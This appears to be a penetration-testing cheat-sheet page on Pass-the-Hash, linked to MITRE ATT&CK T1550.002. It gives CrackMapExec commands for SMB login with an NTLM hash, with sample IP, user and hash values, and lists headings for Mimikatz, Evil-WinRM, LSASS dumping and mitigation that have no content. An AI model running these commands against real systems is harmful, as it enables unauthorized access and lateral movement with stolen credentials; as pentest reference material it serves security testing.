Pass The Hash
https://attack.mitre.org/techniques/T1550/002/
Description
Techniques (Linux)
Crackmapexec
crackmapexec smb <IP> -u <User> -H <NTLM>
crackmapexec smb '10.10.10.100' -u 'moe' -H '58a478135a93ac3bf058a5ea0e8fdb71'
# local account login
crackmapexec smb <IP> -u <User> -H <NTLM> --local-auth
crackmapexec smb '10.10.10.100' -u 'moe' -H '58a478135a93ac3bf058a5ea0e8fdb71' --local-auth
Empire

Evil-WinRM

LDAP

Metasploit

smbclient
xFreeRDP
Techniques (Windows)
Invoke-TheHash
Mimikatz
Scenario
LSASS Memory Credential Dumping
LSASS Memory


Mitigation
Further Reading
Last updated